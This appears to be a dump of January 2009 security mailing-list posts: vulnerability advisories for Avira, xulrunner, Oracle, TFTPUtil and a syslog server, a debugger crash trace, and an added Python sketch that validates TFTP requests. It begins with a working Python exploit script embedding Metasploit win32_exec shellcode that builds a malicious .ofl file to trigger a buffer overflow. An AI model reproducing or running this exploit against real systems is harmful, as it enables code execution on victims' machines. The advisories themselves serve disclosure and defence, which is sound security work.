nops = "\x90" * 4
ret = "\x75\x52\x46";   # call ebx

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9"
"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05"
"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09"
"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d"
"\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26"
"\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64"
"\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb"
"\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28"
"\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44"
"\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38"
"\xac\x2c\xc9\x40"
    )
num = 276 - 4 - 160
buff = "\x41" * num

exploit = nops + shellcode + buff + ret
try:
    out_file = open("open_me.ofl",'w')
    out_file.write(exploit)
    out_file.close()
    raw_input("\nNow open open_me.ofl file to exploit bug!\n")
except:
    print "WTF?"

From - Wed Jan 14 14:32:17 2009
Date: Wed, 14 Jan 2009 18:15:49 +0100
From: Thierry Zoller <Thierry@Zoller.lu>
To: NTBUGTRAQ <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>,
bugtraq <bugtraq@securityfocus.com>,
full-disclosure <full-disclosure@lists.grok.org.uk>,
<info@circl.etat.lu>, <vuln@secunia.com>, <cert@cert.org>,
<nvd@nist.gov>, <cve@mitre.org>
Subject: [TZO-2009-1] Avira Antivir - RAR - Division by Zero &  Null Pointer Dereference

______________________________________________________________________

     Avira - RAR - Division by Zero & Null Pointer Dereference
______________________________________________________________________

Reference     : [TZO-2009-1]-Avira Antivir
Location      : http://blog.zoller.lu/2009/01/advisory-tzo-2009-1-avira-antivir-rar.html
Products      : Avira AntiVir Free
                Avira AntiVir Premium
                Avira Premium Security Suite
                Avira AntiVir Professional
                Avira AntiVir for KEN! 4
                Avira AntiVir & AntiSpam for KEN! 4
                Avira WebProtector for KEN! 4
                Avira AntiVir SharePoint
                Avira AntiVir Virus Scan Adapter for SAP NetWeaver®
                Avira AntiVir MailGate
                Avira MailGate Suite
                Avira AntiVir Exchange
                Avira AntiVir MIMEsweeper
                Avira AntiVir Domino
                Avira AntiVir WebGate
                Avira WebGate Suite
                Avira AntiVir ISA Server
                Avira AntiVir MIMEsweeper
                Avira AntiVir Mobile
                Avira SmallBusiness Suite
                Avira Business Bundle
                Avira AntiVir NetGate Bundle
                Avira AntiVir NetWork Bundle
                Avira AntiVir GateWay Bundle
                Avira AntiVir Campus (for Education)
                                
Vendors and Products using the Avira Engine :
Important : The impact of this flaw on those devices has not been
tested nor confirmed to exist, there is however reason to believe
that the flaw existed in these products as well.

http://www.avira.com/documents/utils/pdf/products/pi_system-integration_en.pdf

               AXIGEN Mail Server
               Clearswift Mimesweeper
               GeNUGate and GeNUGate Pro (optional addon)
               IQ.Suite                 

Vendor        : http://www.avira.de



I. Background
~~~~~~~~~~~~~
Avira is a leading worldwide provider of self-developed protection
solutions for professional and private use. The company belongs to
the pioneers in this sector with over twenty years' experience.

The protection experts have numerous company locations throughout
Germany and cultivate partnerships in Europe, Asia and America.
Avira has more than 180 employees at their main office in Tettnang
near Lake Constance and is one of the largest employers in the
region. There are around 250 people employed worldwide whose
commitment is continually being confirmed by awards. A significant
contribution to protection is the Avira AntiVir Personal which is
being used by private users a million times over.

AV-Comparatives e.V. have chosen Avira AntiVir Premium as the
best anti-virus solution of 2008

II. Description
~~~~~~~~~~~~~~~
By manipulating certain fields inside a RAR archive an attacker
might trigger division by zero and null pointer exceptions. The
attack vector should be rated as remote as an attachment to an
e-mail is enough.

*Anybody else noticed that the amount of details in most
advisories has become less than useful?*


III. Impact
~~~~~~~~~~~~~~~
In some cases the impact is a Denial of Service condition, in
others an invalid read size of 4 bytes, which again in some
cases leads to a null pointer dereference.

The RAR parser inside the module leads to various errors whose
exploitability index is rated "I don't have time for this now - so
let's say 'maybe'" also sometimes known as "I lack the time and/or
the skill to do so".


FAULTING_IP: 
aepack!module_get_api+20ed9
0131cad9 8b10            mov     edx,dword ptr [eax]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 0131cad9 (aepack!module_get_api+0x00020ed9)
   ExceptionCode: c0000005 (Access violation)
   ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 00000268
Attempt to read from address 00000268

FAULTING_THREAD:  00000144
DEFAULT_BUCKET_ID:  INVALID_POINTER_READ

PROCESS_NAME:  avscan.exe
OVERLAPPED_MODULE: Address regions for 'AVREP' and 'rcimage.dll' overlap

READ_ADDRESS:  00000268 
BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_READ_CORRUPT_MODULELIST_OVERLAPPED_MODULE
LAST_CONTROL_TRANSFER:  from 0131cb8c to 0131cad9

STACK_TEXT:  

0194f5fc 0131cb8c 0115bbfc 00000003 00000100 aepack!module_get_api+0x20ed9
0194f618 01319b96 0115bbfc 074cc4f4 00000002 aepack!module_get_api+0x20f8c
0194f654 0131a45a 00000010 01157160 00000001 aepack!module_get_api+0x1df96
0194f668 0131e7e0 000000d4 00f48ba8 011530d0 aepack!module_get_api+0x1e85a
0194f68c 01318c35 01157160 00000010 011530d0 aepack!module_get_api+0x22be0
00000000 00000000 00000000 00000000 00000000 aepack!module_get_api+0x1d035

FOLLOWUP_IP: 
aepack!module_get_api+20ed9
0131cad9 8b10            mov     edx,dword ptr [eax]

SYMBOL_NAME:  aepack!module_get_api+20ed9
MODULE_NAME: aepack
IMAGE_NAME:  aepack.dll
STACK_COMMAND:  ~2s ; kb

FAILURE_BUCKET_ID:  INVALID_POINTER_READ_c0000005_aepack.dll!module_get_api
BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_READ_CORRUPT_MODULELIST_OVERLAPPED_MODULE_aepack!module_get_api+20ed9


IV. Disclosure Timeline
~~~~~~~~~~~~~~~~~~~~~~~~
The vulnerability notification policy I adhere to:
http://blog.zoller.lu/search/label/Vulnerability%20disclosure%20Policy

17/12/2008 : Sent notice to the correct mail address
security@avira. com

17/12/2008 : Avira acknowledges receipt

17/12/2008 : Avira sends details of the root cause on the same
day "The crash occurs in a heavily corrupted, generated RAR
archive while extracting the contents of the 22nd file. We can't
give any file names as they are non-printable characters."

13/01/2009 : Avira notifies me that the issue was fixed with an
update that shipped with AVPack 8.1.3.5 on the 09/01/2009

14/01/2009 : Avira states that all products have been affected
except "Security Management Center" and the "Internet Update
Manager". "In principle that really means all products, except
products such as the Security Management Center or the Internet
Update Manager"

14/01/2009 : Release of this advisory


Thierry Zoller
http://blog.zoller.lu

From - Wed Jan 14 16:32:17 2009
Date: Wed, 14 Jan 2009 21:28:56 +0100
From: Steffen Joeris <white@debian.org>
Sender: Moritz Muehlenhoff <jmm@debian.org>
Subject: [SECURITY] [DSA 1704-1] New xulrunner packages fix several vulnerabilities
To: bugtraq@securityfocus.com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1704                    security@debian.org
http://www.debian.org/security/                           Steffen Joeris
January 14, 2009                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : xulrunner
Vulnerability  : several vulnerabilities
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2008-5500 CVE-2008-5503 CVE-2008-5506 CVE-2008-5507 CVE-2008-5508 CVE-2008-5511 CVE-2008-5512

Several remote vulnerabilities have been discovered in Xulrunner, a
runtime environment for XUL applications. The Common Vulnerabilities and
Exposures project identifies the following problems:

CVE-2008-5500

   Jesse Ruderman discovered that the layout engine is vulnerable to
   DoS attacks that might trigger memory corruption and an integer
   overflow. (MFSA 2008-60)

CVE-2008-5503

   Boris Zbarsky discovered that an information disclosure attack could
   be performed via XBL bindings. (MFSA 2008-61)

CVE-2008-5506

   Marius Schilder discovered that it is possible to obtain sensible
   data via an XMLHttpRequest. (MFSA 2008-64)

CVE-2008-5507

   Chris Evans discovered that it is possible to obtain sensible data
   via a JavaScript URL. (MFSA 2008-65)

CVE-2008-5508

   Chip Salzenberg discovered possible phishing attacks via URLs with
   leading whitespaces or control characters. (MFSA 2008-66)

CVE-2008-5511

   It was discovered that it is possible to perform cross-site scripting
   attacks via an XBL binding to an "unloaded document." (MFSA 2008-68)

CVE-2008-5512

   It was discovered that it is possible to run arbitrary JavaScript
   with chrome privileges via unknown vectors. (MFSA 2008-68)

For the stable distribution (etch) these problems have been fixed in
version 1.8.0.15~pre080614i-0etch1.

For the testing distribution (lenny) and the unstable distribution (sid)
these problems have been fixed in version 1.9.0.5-1.

We recommend that you upgrade your xulrunner packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1.diff.gz
    Size/MD5 checksum:      971 73ec26e81ce6e401845eb070aa26d909
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i-0etch1.dsc
    Size/MD5 checksum:     1981 87dd485ac774e78373be5a196cbc8320
  http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.8.0.15~pre080614i.orig.tar.gz
    Size/MD5 checksum: 43320191 82b3061f947787bf267a36513a6bd2dd

Architecture independent packages:

  http://security.debian.org/pool/updates/main/x/xulrunner/libnss3-dev_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:   231436 f692e056f6eccb9633771a1b5d56d115
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul-common_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:  1052120 9935f278d06c5256a1cb6d34f6b43777
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:   176532 03d96486a1cb92ca65b39376add42232
  http://security.debian.org/pool/updates/main/x/xulrunner/libxul-dev_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:  2638014 f4c9fed2489696b18ecedf945729ffa7
  http://security.debian.org/pool/updates/main/x/xulrunner/libsmjs1_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:    37402 033e412379eab51f4608530af659596a
  http://security.debian.org/pool/updates/main/x/xulrunner/libmozillainterfaces-java_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:  1032570 b8277c4699e9f2edc9131c525c72ac2a
  http://security.debian.org/pool/updates/main/x/xulrunner/libnspr4-dev_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:   208008 d6685b7c5a83eb2fc383ad2284e0c300
  http://security.debian.org/pool/updates/main/x/xulrunner/libsmjs-dev_1.8.0.15~pre080614i-0etch1_all.deb
    Size/MD5 checksum:    37436 a668ef6417fe2f868964b2e1f1cd9028

alpha architecture (DEC Alpha)

amd64 architecture (AMD x86_64 (AMD64))

arm architecture (ARM)

hppa architecture (HP PA RISC)

i386 architecture (Intel ia32)

ia64 architecture (Intel ia64)

mips architecture (MIPS (Big Endian))

mipsel architecture (MIPS (Little Endian))

powerpc architecture (PowerPC)

s390 architecture (IBM S/390)

sparc architecture (Sun SPARC/UltraSPARC)


  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

From - Wed Jan 14 16:42:17 2009
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-09-003: Oracle Secure Backup exec_qr() Command Injection Vulnerability
From: zdi-disclosures@3com.com
Date: Wed, 14 Jan 2009 14:29:40 -0600
From - Wed Jan 14 16:52:18 2009
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-09-004: Oracle TimesTen evtdump Remote Format String Vulnerability
From: zdi-disclosures@3com.com
Date: Wed, 14 Jan 2009 14:30:01 -0600
From - Wed Jan 14 17:02:18 2009
Subject: Oracle Secure Backup 10g Remote Code Execution
From: Joxean Koret <joxeankoret@yahoo.es>
To: bugtraq@securityfocus.com
Date: Wed, 14 Jan 2009 21:51:47 +0100



Hi,

Happy new year! Attached goes an advisory for one of the recently fixed
Oracle vulnerabilities in the product Oracle Secure Backup.

Regards,
Joxean Koret



--=-khnqrW9NU0VZCuXuDSRv
Content-Disposition: attachment; filename=oracle-secure-backup-2009-01-14.txt
Content-Type: text/plain; name=oracle-secure-backup-2009-01-14.txt; charset=UTF-8
Content-Transfer-Encoding: base64



--=-khnqrW9NU0VZCuXuDSRv--

--=-YhepHLVg9ODiz52nJhvx
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part


--=-YhepHLVg9ODiz52nJhvx--




From - Wed Jan 14 17:12:17 2009
Subject: Oracle TimesTen Remote Format String
From: Joxean Koret <joxeankoret@yahoo.es>
To: Full Disclosure <full-disclosure@lists.grok.org.uk>,
bugtraq@securityfocus.com
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-FHE+nIKLYvfBYNKSgYeb"
Date: Wed, 14 Jan 2009 21:53:05 +0100
Message-Id: <1231966385.18860.11.camel@joxean-desktop.etxea.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.22.3.1 
Status:   


--=-FHE+nIKLYvfBYNKSgYeb
Content-Type: multipart/mixed; boundary="=-Y1d5wnjF15zP9y7LtuBL"


--=-Y1d5wnjF15zP9y7LtuBL
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Hi again,

Attached goes an advisory for the unique vulnerability in Oracle
TimesTen fixed in the Oracle Critical Patch Update January 2009.

Cheers!
Joxean Koret



--=-Y1d5wnjF15zP9y7LtuBL
Content-Disposition: attachment; filename=oracle-times-ten-2009-01-14.txt
Content-Transfer-Encoding: base64
Content-Type: text/plain; name=oracle-times-ten-2009-01-14.txt; charset=UTF-8

--=-Y1d5wnjF15zP9y7LtuBL--

--=-FHE+nIKLYvfBYNKSgYeb
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part


--=-FHE+nIKLYvfBYNKSgYeb--




From - Thu Jan 15 11:22:18 2009
Date: Wed, 14 Jan 2009 17:04:35 -0700
Message-Id: <200901150004.n0F04ZJQ028021@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: vuln_research@princeofnigeria.org
To: bugtraq@securityfocus.com
Subject: TFTPUtil GUI TFTP Directory Traversal
Status:   

Title: TFTPUtil GUI TFTP Directory Traversal
Product: TFTPUtil GUI

Discovered: November 26, 2008
Discovered by: Rob Kraus, princeofnigeria (PoN)

Vendor: k23productions
Vendor URL: http://sourceforge.net/projects/tftputil
Vendor notification date: December 1, 2008
Vendor response date: December 8, 2008
Vendor acknowledgement: December 8, 2008
Vendor provided fix: December 8, 2008
Release coordinated with the vendor: --
Public disclosure date: January 14, 2009

Affects: TFTPUtil GUI versions 1.2.0 and 1.3.0
Fixed in: 1.4.0
Risk: Medium

Vulnerability Description: TFTPUtil GUI versions 1.2.0 and 1.3.0 are prone to a directory-traversal vulnerability because they fail to sanitize TFTP GET requests. By using a specially crafted TFTP GET request, an attacker is capable of retrieving files outside of the TFTP root directory.

Impact: The ability to obtain files outside of the TFTP root directory may allow an attacker to obtain more information about the underlying operating system and applications running on the host.

Keywords: security, vulnerability, tftp, directory traversal, princeofnigeria, gui, windows, server

[--Background--]

Type of vulnerability: Input validation flaw
Who can exploit it: Local and remote users

TFTPUtil GUI is an application that provides services for transferring configuration files, firmware files and other types of data using the TFTP protocol. The application should restrict GET requests to the contents of the TFTP root directory to prevent obtaining data from other parts of the host operating system.

Vulnerability Scope: The default installation of TFTPUtil 1.2.0 or 1.3.0 will allow exploitation of this vulnerability.

[--More Details--]

Exploitation of this flaw is trivial and can be executed using any RFC 1350 compliant TFTP client software. No exploit code is required.

[--Fix or Workaround Information--]

Patch availability: 1.4.0
Vendor provided fix: 1.4.0
Workarounds: Update to 1.4.0

[--Disclosure Policy--]

PrinceofNigeria.org Vulnerability Disclosure Policy
http://www.princeofnigeria.org/blogs/index.php/vulndev/vulnreleasepolicy/?blog=1

[--Disclosure History--]

Public disclosure date: January 14, 2009

[--References--]
CVE-ID:
Bugtraq ID:
Secunia ID:
OSVDB ID:

[--Author--]
Rob Kraus, princeofnigeria (PoN)
Website: www.princeofnigeria.org/blogs

From - Thu Jan 15 11:32:18 2009
Date: Wed, 14 Jan 2009 17:16:07 -0700
Message-Id: <200901150016.n0F0G7Fs025883@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: vuln_research@princeofnigeria.org
To: bugtraq@securityfocus.com
Subject: TFTPUtil GUI TFTP Server Denial of Service Vulnerability
Status:   

[--Vulnerability Summary--]

Title: TFTPUtil GUI TFTP Server Denial of Service Vulnerability
Product: TFTPUtil GUI

Discovered: November 26, 2008
Discovered by: Rob Kraus, princeofnigeria (PoN)

Vendor: k23productions (as per various download sites)
Vendor URL: http://sourceforge.net/projects/tftputil
Vendor notification date: December 1, 2008
Vendor response date: December 8, 2008
Vendor acknowledgment: December 8, 2008
Vendor provided fix: December 8, 2008
Release coordinated with the vendor: --
Public disclosure date: January 14, 2009

Affects: TFTPUtil GUI versions 1.2.0 and 1.3.0
Fixed in: 1.4.0
Risk: High

Vulnerability Description: TFTPUtil GUI versions 1.2.0 and 1.3.0 are vulnerable to a remote denial-of-service vulnerability because they fail to handle user-supplied input. Sending a specially crafted TFTP request with an overlong filename will cause the application to become unstable and stop responding.

Impact: A remote or local attacker can exploit this flaw by sending a specially crafted packet to the TFTP server. Successful exploitation of this flaw will cause the TFTP server process to crash preventing valid users or devices from using the service. The TFTP server will need to be restarted to resume normal TFTP server operations.

Keywords: security, vulnerability, tftp, dos, princeofnigeria, gui, windows, server, denial, service

[--Background--]

Type of vulnerability: Input validation flaw
Who can exploit it: Local or Remote users

TFTPUtil GUI is an application that provides services for transferring configuration files, firmware files and other types of data using the TFTP protocol. The application should validate and sanitize all user input to prevent unexpected conditions.

Vulnerability Scope: The default installation of TFTPUtil 1.2.0 or 1.3.0 will allow exploitation of this vulnerability.

[--More Details--]

Exploitation of this flaw is trivial and can be executed using any RFC 1350 compliant TFTP client software. No exploit code is required.

[--Fix or Workaround Information--]

Patch availability: 1.4.0
Vendor provided fix: 1.4.0
Workarounds: Upgrading to version 1.4.0 addresses this vulnerability

[--Disclosure Policy--]

PrinceofNigeria.org Vulnerability Disclosure Policy
http://www.princeofnigeria.org/blogs/index.php/vulndev/vulnreleasepolicy/?blog=1

[--Disclosure History--]

Public disclosure date: January 14, 2009

[--References--]
CVE-ID:
Bugtraq ID:
Secunia ID:
OSVDB ID:

[--Author--]
Rob Kraus, princeofnigeria (PoN)
Website: www.princeofnigeria.org/blogs
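
The two TFTPUtil GUI advisories above both trace back to the filename field of a TFTP request being used without validation (files served from outside the TFTP root, and a crash on an overlong filename). The following Python sketch is an added example, not TFTPUtil's code or the vendor's 1.4.0 fix: it shows the checks a server can apply to an RFC 1350 read request before touching the filesystem. The size limits, function names and sample requests are assumptions constructed for illustration.

```python
import os
import struct
import tempfile

OP_RRQ, OP_ERROR = 1, 5                            # RFC 1350 opcodes
ERR_NOT_FOUND, ERR_ACCESS, ERR_ILLEGAL = 1, 2, 4   # RFC 1350 error codes
MAX_REQUEST = 512     # assumed cap on request datagram size
MAX_FILENAME = 255    # assumed cap on filename length
MODES = {"netascii", "octet"}


class TftpReject(Exception):
    """A request the server refuses; carries the RFC 1350 error code."""

    def __init__(self, code, message):
        super().__init__(message)
        self.code = code

    def packet(self):
        """Encode the refusal as an RFC 1350 ERROR packet."""
        head = struct.pack("!HH", OP_ERROR, self.code)
        return head + str(self).encode("ascii") + b"\0"


def parse_rrq(datagram):
    """Return (filename, mode) from a read request or raise TftpReject."""
    if not 4 <= len(datagram) <= MAX_REQUEST:
        raise TftpReject(ERR_ILLEGAL, "bad request size")
    if struct.unpack("!H", datagram[:2])[0] != OP_RRQ:
        raise TftpReject(ERR_ILLEGAL, "not a read request")
    # Well formed: filename NUL mode NUL [option NUL value NUL ...]
    fields = datagram[2:].split(b"\0")
    if len(fields) < 3 or fields[-1] != b"":
        raise TftpReject(ERR_ILLEGAL, "unterminated field")
    try:
        name = fields[0].decode("ascii")
        mode = fields[1].decode("ascii").lower()
    except UnicodeDecodeError:
        raise TftpReject(ERR_ILLEGAL, "non-ASCII field") from None
    if not 1 <= len(name) <= MAX_FILENAME:
        raise TftpReject(ERR_ILLEGAL, "filename length out of range")
    if mode not in MODES:
        raise TftpReject(ERR_ILLEGAL, "unsupported mode")
    return name, mode


def resolve_in_root(root, filename):
    """Map a client-supplied name to a real path inside root or raise."""
    # Treat "\" and "/" alike so the check is the same on Windows and POSIX.
    parts = filename.replace("\\", "/").split("/")
    if filename[0] in "/\\" or ":" in filename or ".." in parts:
        raise TftpReject(ERR_ACCESS, "path outside TFTP root")
    root_real = os.path.realpath(root)
    # realpath resolves symlinks, commonpath then confirms containment.
    candidate = os.path.realpath(os.path.join(root_real, *parts))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise TftpReject(ERR_ACCESS, "path outside TFTP root")
    return candidate


def check_request(root, datagram):
    """Return ("ok", path) or ("error", error_packet) for one datagram."""
    try:
        name, _mode = parse_rrq(datagram)
        path = resolve_in_root(root, name)
        if not os.path.isfile(path):
            raise TftpReject(ERR_NOT_FOUND, "file not found")
        return "ok", path
    except TftpReject as exc:
        return "error", exc.packet()


def demo():
    """Run constructed requests against a throwaway root; return verdicts."""
    def rrq(name, mode=b"octet"):
        return struct.pack("!H", OP_RRQ) + name + b"\0" + mode + b"\0"

    samples = {                                   # constructed test inputs
        "plain": rrq(b"router.cfg"),
        "missing": rrq(b"nothere.bin"),
        "dotdot": rrq(b"../secret.txt"),
        "backslash": rrq(b"..\\secret.txt"),
        "absolute": rrq(b"/etc/hostname"),
        "drive": rrq(b"C:\\boot.ini"),
        "overlong": rrq(b"A" * 400),
        "unterminated": struct.pack("!H", OP_RRQ) + b"router.cfg",
    }
    results = {}
    with tempfile.TemporaryDirectory() as base:
        root = os.path.join(base, "tftproot")
        os.mkdir(root)
        for path in (os.path.join(root, "router.cfg"),
                     os.path.join(base, "secret.txt")):
            with open(path, "w") as fh:
                fh.write("constructed sample\n")
        for label, datagram in samples.items():
            status, detail = check_request(root, datagram)
            code = struct.unpack("!HH", detail[:4])[1] if status == "error" else None
            results[label] = (status, code)
    return results


if __name__ == "__main__":
    for label, verdict in demo().items():
        print(label, verdict)
```

Rejecting with an ERROR packet instead of raising an unhandled exception keeps the server process alive when a malformed or oversized request arrives.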

From - Thu Jan 15 11:38:13 2009
Date: Wed, 14 Jan 2009 17:20:49 -0700
Message-Id: <200901150020.n0F0Knf7030408@www3.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: vuln_research@princeofnigeria.org
To: bugtraq@securityfocus.com
Subject: Windows NTP Time Server Syslog Monitor 1.0.000 Denial of Service
 Vulnerability
Status:   

[--Vulnerability Summary--]

Title: Windows NTP Time Server Syslog Monitor 1.0.000 Denial of Service Vulnerability
Product: Windows NTP Time Server Syslog Monitor 1.0.000

Discovered: November 29, 2008
Discovered by: Rob Kraus, princeofnigeria (PoN)

Vendor: TimeTools
Vendor URL: http://www.timetools.co.uk
Vendor notification date: December 1, 2008
Vendor response date: --
Vendor acknowledgment: --
Vendor provided fix: --
Release coordinated with the vendor: --
Public disclosure date: January 14, 2009

Affects: Windows NTP Time Server Syslog Monitor 1.0.000
Fixed in: No fix currently available.
Risk: High

Vulnerability Description: Windows NTP Time Server Syslog Monitor 1.0.000 is vulnerable to a remote denial-of-service vulnerability because it fails to handle user-supplied input. Sending a specially crafted UDP Syslog request will cause the application to become unstable and stop responding.

Impact: A remote or local attacker can exploit this flaw by sending a specially crafted packet to the Syslog server. Successful exploitation of this flaw will cause the Syslog server process to crash preventing valid users or devices from using the service. The Syslog server will need to be restarted to resume normal Syslog server operations.

Keywords: security, vulnerability, syslog, princeofnigeria, windows, server, udp, dos, denial of service

[--Background--]

Type of vulnerability: Input validation flaw
Who can exploit it: Local or Remote users

Windows NTP Time Server Syslog Monitor 1.0.000 is an application that provides services for receiving system event messages to provide a centralized reporting interface for distributed system events. The application should validate and sanitize all user input to prevent unexpected conditions.

Per software download sites description: "TimeTools Windows Atomic Clock NTP Server Syslog Daemon is a free utility that runs on any Windows NT/2000/XP/2003 workstation or server. It allows any syslog messages from any Linux or Unix based syslog client to be logged and displayed."

Vulnerability Scope: The default installation of Windows NTP Time Server Syslog Monitor 1.0.000 will allow exploitation of this vulnerability.

[--More Details--]

Exploitation of this flaw can be executed by sending a specially crafted UDP packet to the target server. No exploit code is required.

[--Fix or Workaround Information--]

Patch availability: None
Vendor provided fix: None
Workarounds: None available at this time, design flaw. Discontinue use of this product until a stable patch is released.

[--Disclosure Policy--]

PrinceofNigeria.org Vulnerability Disclosure Policy
http://www.princeofnigeria.org/blogs/index.php/vulndev/vulnreleasepolicy/?blog=1

[--Disclosure History--]

Public disclosure date: January 14, 2009

[--References--]
CVE-ID:
Bugtraq ID:
Secunia ID:
OSVDB ID:

[--Author--]
Rob Kraus, princeofnigeria (PoN)
Website: www.princeofnigeria.org/blogs

From - Thu Jan 15 11:42:18 2009
Date: Thu, 15 Jan 2009 01:01:06 +0000 (UTC)
From: security curmudgeon <jericho@attrition.org>
To: bugtraq@securityfocus.com
Cc: trees@assurent.com, support@bea.com,
Oracle Security Alerts <secalert_us@oracle.com>
Subject: Re: Assurent VR - Oracle BEA WebLogic Server Apache Connector Buffer
 Overflow
In-Reply-To: <20090113225723.79AD368018E@sticky.vrt.telus.com>
Message-ID: <Pine.LNX.4.64.0901150040320.13704@forced.attrition.org>
References: <20090113225723.79AD368018E@sticky.vrt.telus.com>
X-Attrition: Attrition is only good when forced. http://attrition.org
X-OSVDB: Everything is vulnerable. http://osvdb.org
X-Message-Flag: WARNING: Over 75 security vulnerabilities in Microsoft Outlook as of Feb 15 2008!
X-Copyright: This e-mail copyright 2008 by jericho@attrition.org where applicable
X-Encryption: rot26
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Status:   



Hello Assurent & Oracle,

On Tue, 13 Jan 2009, VR-Subscription-noreply@assurent.com wrote:

: Oracle BEA WebLogic Server Apache Connector Buffer Overflow

: Reference: http://www.bea.com/weblogic/server/

: 2. Vulnerability Summary

: A remotely exploitable vulnerability has been discovered in the Apache 
: Connector component of Oracle BEA WebLogic Server. Specifically, the 
: vulnerability is due to a boundary error when processing incoming HTTP 
: requests and can lead to a buffer overflow condition. This boundary 
: error can lead to a Denial of Service (DoS) condition for the Apache 
: HTTP server.

: 3. Vulnerability Analysis

: A remote unauthenticated attacker can exploit the vulnerability by 
: sending a malicious HTTP request to the target system. A successful 
: attack will result in a Denial of Service (DoS) condition for the Apache 
: HTTP server, including all Apache-negotiated HTTP traffic to the 
: WebLogic Server.

: Reference: https://support.bea.com/application_content/product_portlets/securityadvisories/2809.html

According to Assurent, this is a remote overflow that creates a DoS 
condition. No mention of running arbitrary code.

Oracle's advisory says:

CVSS Severity Score: 10.0 (High)
Attack Range (AV): Network
Attack Complexity (AC): Low 
Authentication Level (Au): None 
Impact Type: Complete confidentiality, integrity and availability violation
Vulnerability Type: Denial of Service 
CVSS Base Score Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)

So it is a "Denial of Service" but results in a complete compromise of 
confidentiality, integrity and availability. A 10.0 score typically means 
remote, unauthenticated execution of attacker-controlled code. Which is 
correct?

Further, Oracle's advisory says this affects "Security vulnerability in 
WebLogic plug-ins for Apache, Sun and IIS Web servers", implying this 
affects multiple plug-ins, not just the one for Apache. The advisory also 
uses this wording further suggesting three separate plug-ins: "This 
vulnerability may impact the availability, confidentiality or integrity of 
WebLogic Server applications, which use the Apache, Sun or IIS web server 
configured with the WebLogic plug-in for Apache, Sun or IIS respectively."

Is it really one plug-in that works with all three? Or does this only 
affect an Apache plug-in?

From - Thu Jan 15 11:52:18 2009
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:011 ] virtualbox
Date: Wed, 14 Jan 2009 19:29:00 -0700
From: security@mandriva.com
